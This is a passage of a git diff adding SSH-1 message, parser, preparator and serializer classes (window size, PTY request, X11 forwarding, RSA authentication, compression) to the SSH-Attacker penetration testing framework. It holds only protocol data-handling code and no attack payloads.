ModifiableVariableFactory.safelySetValue(this.widthColumns, widthColumns); + } + + public ModifiableInteger getWidthPixel() { + return widthPixel; + } + + public void setWidthPixel(ModifiableInteger widthPixel) { + this.widthPixel = widthPixel; + } + + public void setWidthPixel(int widthPixel) { + this.widthPixel = ModifiableVariableFactory.safelySetValue(this.widthPixel, widthPixel); + } + + public ModifiableInteger getHightPixel() { + return hightPixel; + } + + public void setHightPixel(ModifiableInteger hightPixel) { + this.hightPixel = hightPixel; + } + + public void setHightPixel(int hightPixel) { + this.hightPixel = ModifiableVariableFactory.safelySetValue(this.hightPixel, hightPixel); + } + + public ModifiableInteger getTtyModes() { + return ttyModes; + } + + public void setTtyModes(ModifiableInteger ttyModes) { + this.ttyModes = ttyModes; + } + + public void setTtyModes(int ttyModes) { + this.ttyModes = ModifiableVariableFactory.safelySetValue(this.ttyModes, ttyModes); + } + + @Override + public RequestPtyMessageSSHv1Handler getHandler(SshContext context) { + return new RequestPtyMessageSSHv1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new RequestPtyMessageSSHv1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new RequestPtyMessageSSHv1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new RequestPtyMessageSSHv1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_SMSG_SUCCESS"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/WindowSizeMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/WindowSizeMessageSSH1.java new file mode 100644 index 000000000..8f5a07f6e --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/WindowSizeMessageSSH1.java @@ -0,0 +1,104 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.WindowSizeMessageSSHv1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.WindowSizeMessageSSHv1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.WindowSizeMessageSSHv1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.WindowSizeMessageSSHv1Serializier; +import java.io.InputStream; + +public class WindowSizeMessageSSH1 extends SshMessage { + + ModifiableInteger hightRows; + ModifiableInteger widthColumns; + ModifiableInteger widthPixel; + ModifiableInteger hightPixel; + + public ModifiableInteger getHightRows() { + return hightRows; + } + + public void setHightRows(ModifiableInteger hightRows) { + this.hightRows = hightRows; + } + + public void setHightRows(int hightRows) { + this.hightRows = ModifiableVariableFactory.safelySetValue(this.hightRows, hightRows); + } + + public ModifiableInteger getWidthColumns() { + return widthColumns; + } + + public void setWidthColumns(ModifiableInteger widthColumns) { + this.widthColumns = widthColumns; + } + + public void setWidthColumns(int widthColumns) { + this.widthColumns = + ModifiableVariableFactory.safelySetValue(this.widthColumns, widthColumns); + } + + public ModifiableInteger getWidthPixel() { + return widthPixel; + } + + public void setWidthPixel(ModifiableInteger widthPixel) { + this.widthPixel = widthPixel; + } + + public void setWidthPixel(int widthPixel) { + this.widthPixel = ModifiableVariableFactory.safelySetValue(this.widthPixel, widthPixel); + } + + public ModifiableInteger getHightPixel() { + return hightPixel; + } + + public void setHightPixel(ModifiableInteger hightPixel) { + this.hightPixel = hightPixel; + } + + public void setHightPixel(int hightPixel) { + this.hightPixel = ModifiableVariableFactory.safelySetValue(this.hightPixel, hightPixel); + } + + @Override + public WindowSizeMessageSSHv1Handler getHandler(SshContext context) { + return new WindowSizeMessageSSHv1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new WindowSizeMessageSSHv1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new WindowSizeMessageSSHv1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new WindowSizeMessageSSHv1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_SMSG_SUCCESS"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/X11RequestForwardMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/X11RequestForwardMessageSSH1.java new file mode 100644 index 000000000..1431d015f --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/X11RequestForwardMessageSSH1.java @@ -0,0 +1,96 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.X11RequestForwardMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.X11RequestForwardMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.X11RequestForwardMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.X11RequestForwardMessageSSHV1Serializier; +import java.io.InputStream; + +public class X11RequestForwardMessageSSH1 extends SshMessage { + + private ModifiableInteger screenNumber; + private ModifiableString x11AuthenticationProtocol; + private ModifiableString x11AuthenticationData; + + public ModifiableString getX11AuthenticationData() { + return x11AuthenticationData; + } + + public void setX11AuthenticationData(ModifiableString x11AuthenticationData) { + this.x11AuthenticationData = x11AuthenticationData; + } + + public void setX11AuthenticationData(String x11AuthenticationData) { + this.x11AuthenticationData = + ModifiableVariableFactory.safelySetValue( + this.x11AuthenticationData, x11AuthenticationData); + } + + public ModifiableString getX11AuthenticationProtocol() { + return x11AuthenticationProtocol; + } + + public void setX11AuthenticationProtocol(ModifiableString x11AuthenticationProtocol) { + this.x11AuthenticationProtocol = x11AuthenticationProtocol; + } + + public void setX11AuthenticationProtocol(String x11AuthenticationProtocol) { + this.x11AuthenticationProtocol = + ModifiableVariableFactory.safelySetValue( + this.x11AuthenticationProtocol, x11AuthenticationProtocol); + } + + public ModifiableInteger getScreenNumber() { + return screenNumber; + } + + public void setScreenNumber(ModifiableInteger screenNumber) { + this.screenNumber = screenNumber; + } + + public void setScreenNumber(int screenNumber) { + this.screenNumber = + ModifiableVariableFactory.safelySetValue(this.screenNumber, screenNumber); + } + + @Override + public X11RequestForwardMessageSSHV1Handler getHandler(SshContext context) { + return new X11RequestForwardMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new X11RequestForwardMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new X11RequestForwardMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new X11RequestForwardMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_MSG_CHANNEL_OPEN_FAILURE"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthRhostsRsaMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthRhostsRsaMessageSSHV1Parser.java new file mode 100644 index 000000000..213955c2d --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthRhostsRsaMessageSSHV1Parser.java @@ -0,0 +1,50 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.modifiablevariable.util.ArrayConverter; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthRhostsRsaMessageSSH1; +import java.io.InputStream; +import java.math.BigInteger; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthRhostsRsaMessageSSHV1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthRhostsRsaMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseData(AuthRhostsRsaMessageSSH1 message) { + + int usernameLenght = parseIntField(4); + String username = parseByteString(usernameLenght); + message.setUsername(username); + + int hostKeyBits = parseIntField(4); + message.setClientHostKeyBits(hostKeyBits); + + BigInteger hostKeyExponent = parseMultiprecision(); + BigInteger hostKeyModulus = parseMultiprecision(); + message.setHostPublicExponent(ArrayConverter.bigIntegerToByteArray(hostKeyExponent)); + message.setHostPublicModulus(ArrayConverter.bigIntegerToByteArray(hostKeyModulus)); + } + + @Override + protected void parseMessageSpecificContents(AuthRhostsRsaMessageSSH1 message) { + parseData(message); + } + + @Override + public void parse(AuthRhostsRsaMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthRsaResponseMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthRsaResponseMessageSSHV1Parser.java new file mode 100644 index 000000000..99309dec0 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/AuthRsaResponseMessageSSHV1Parser.java @@ -0,0 +1,39 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthRsaResponseMessageSSH1; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthRsaResponseMessageSSHV1Parser + extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthRsaResponseMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseExitStatus(AuthRsaResponseMessageSSH1 message) { + int exitStatus = parseIntField(2); + message.setMd5Response(exitStatus); + } + + @Override + protected void parseMessageSpecificContents(AuthRsaResponseMessageSSH1 message) { + parseExitStatus(message); + } + + @Override + public void parse(AuthRsaResponseMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RequestCompressionMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RequestCompressionMessageSSHV1Parser.java new file mode 100644 index 000000000..ef73d022c --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RequestCompressionMessageSSHV1Parser.java @@ -0,0 +1,39 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RequestCompressionMessageSSH1; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RequestCompressionMessageSSHV1Parser + extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public RequestCompressionMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseExitStatus(RequestCompressionMessageSSH1 message) { + int compressionState = parseIntField(4); + message.setCompressionState(compressionState); + } + + @Override + protected void parseMessageSpecificContents(RequestCompressionMessageSSH1 message) { + parseExitStatus(message); + } + + @Override + public void parse(RequestCompressionMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RequestPtyMessageSSHv1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RequestPtyMessageSSHv1Parser.java new file mode 100644 index 000000000..b68d8dea1 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/RequestPtyMessageSSHv1Parser.java @@ -0,0 +1,49 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RequestPtyMessageSSH1; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RequestPtyMessageSSHv1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public RequestPtyMessageSSHv1Parser(SshContext context, InputStream stream) { + super(stream); + } + + @Override + protected void parseMessageSpecificContents(RequestPtyMessageSSH1 message) { + + int termEnvLenght = parseIntField(4); + String termEnvironment = parseByteString(termEnvLenght); + message.setTermEnvironment(termEnvironment); + + int hightRows = parseIntField(4); + int widthColumns = parseIntField(4); + int widthPixel = parseIntField(4); + int hightPixel = parseIntField(4); + + message.setHightRows(hightRows); + message.setWidthColumns(widthColumns); + message.setWidthPixel(widthPixel); + message.setHightPixel(hightPixel); + + int ttyModes = parseIntField(4); + message.setTtyModes(ttyModes); + } + + @Override + public void parse(RequestPtyMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/WindowSizeMessageSSHv1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/WindowSizeMessageSSHv1Parser.java new file mode 100644 index 000000000..e2e3f5626 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/WindowSizeMessageSSHv1Parser.java @@ -0,0 +1,42 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.WindowSizeMessageSSH1; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class WindowSizeMessageSSHv1Parser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public WindowSizeMessageSSHv1Parser(SshContext context, InputStream stream) { + super(stream); + } + + @Override + protected void parseMessageSpecificContents(WindowSizeMessageSSH1 message) { + + int hightRows = parseIntField(4); + int widthColumns = parseIntField(4); + int widthPixel = parseIntField(4); + int hightPixel = parseIntField(4); + + message.setHightRows(hightRows); + message.setWidthColumns(widthColumns); + message.setWidthPixel(widthPixel); + message.setHightPixel(hightPixel); + } + + @Override + public void parse(WindowSizeMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/X11RequestForwardMessageSSHV1Parser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/X11RequestForwardMessageSSHV1Parser.java new file mode 100644 index 000000000..50f3ccdd7 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/X11RequestForwardMessageSSHV1Parser.java @@ -0,0 +1,46 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11RequestForwardMessageSSH1; +import java.io.InputStream; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class X11RequestForwardMessageSSHV1Parser + extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public X11RequestForwardMessageSSHV1Parser(SshContext context, InputStream stream) { + super(stream); + } + + private void parseData(X11RequestForwardMessageSSH1 message) { + + int authenticationProtocolLenght = parseIntField(4); + String authenticationProtocol = parseByteString(authenticationProtocolLenght); + int authenticationDataLenght = parseIntField(4); + String authenticationData = parseByteString(authenticationDataLenght); + int screenNumber = parseIntField(4); + message.setX11AuthenticationProtocol(authenticationProtocol); + message.setX11AuthenticationData(authenticationData); + message.setScreenNumber(screenNumber); + } + + @Override + protected void parseMessageSpecificContents(X11RequestForwardMessageSSH1 message) { + parseData(message); + } + + @Override + public void parse(X11RequestForwardMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthRhostsRsaMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthRhostsRsaMessageSSHV1Preparator.java new file mode 100644 index 000000000..eb9c2804c --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthRhostsRsaMessageSSHV1Preparator.java @@ -0,0 +1,30 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthRhostsRsaMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthRhostsRsaMessageSSHV1Preparator + extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthRhostsRsaMessageSSHV1Preparator(Chooser chooser, AuthRhostsRsaMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_AUTH_RHOSTS_RSA); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthRsaResponseMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthRsaResponseMessageSSHV1Preparator.java new file mode 100644 index 000000000..c6c31a541 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/AuthRsaResponseMessageSSHV1Preparator.java @@ -0,0 +1,31 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthRsaResponseMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AuthRsaResponseMessageSSHV1Preparator + extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AuthRsaResponseMessageSSHV1Preparator( + Chooser chooser, AuthRsaResponseMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_AUTH_RSA_RESPONSE); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RequestCompressionMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RequestCompressionMessageSSHV1Preparator.java new file mode 100644 index 000000000..61861ad39 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RequestCompressionMessageSSHV1Preparator.java @@ -0,0 +1,35 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RequestCompressionMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RequestCompressionMessageSSHV1Preparator + extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public RequestCompressionMessageSSHV1Preparator( + Chooser chooser, RequestCompressionMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_REQUEST_COMPRESSION); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getCompressionState() == null) { + getObject().setCompressionState(0); + } + LOGGER.debug(getObject().getCompressionState().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RequestPtyMessageSSHv1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RequestPtyMessageSSHv1Preparator.java new file mode 100644 index 000000000..fe3d90fdb --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/RequestPtyMessageSSHv1Preparator.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.RequestPtyMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class RequestPtyMessageSSHv1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public RequestPtyMessageSSHv1Preparator(Chooser chooser, RequestPtyMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_REQUEST_PTY); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/WindowSizeMessageSSHv1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/WindowSizeMessageSSHv1Preparator.java new file mode 100644 index 000000000..38cdd87e9 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/WindowSizeMessageSSHv1Preparator.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.WindowSizeMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class WindowSizeMessageSSHv1Preparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public WindowSizeMessageSSHv1Preparator(Chooser chooser, WindowSizeMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_WINDOW_SIZE); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/X11RequestForwardMessageSSHV1Preparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/X11RequestForwardMessageSSHV1Preparator.java new file mode 100644 index 000000000..347e1f67f --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/X11RequestForwardMessageSSHV1Preparator.java @@ -0,0 +1,35 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11RequestForwardMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class X11RequestForwardMessageSSHV1Preparator + extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public X11RequestForwardMessageSSHV1Preparator( + Chooser chooser, X11RequestForwardMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_CMSG_X11_REQUEST_FORWARDING); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + if (getObject().getScreenNumber() == null) { + getObject().setScreenNumber(0); + } + LOGGER.debug(getObject().getScreenNumber().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthRhostsRsaMessageSSHV1Serializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthRhostsRsaMessageSSHV1Serializier.java new file mode 100644 index 000000000..20589cbf7 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/AuthRhostsRsaMessageSSHV1Serializier.java @@ -0,0 +1,38 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AuthRhostsRsaMessageSSH1; +import java.nio.charset.StandardCharsets; +import org.apache.logging.log4j.LogManager; +import 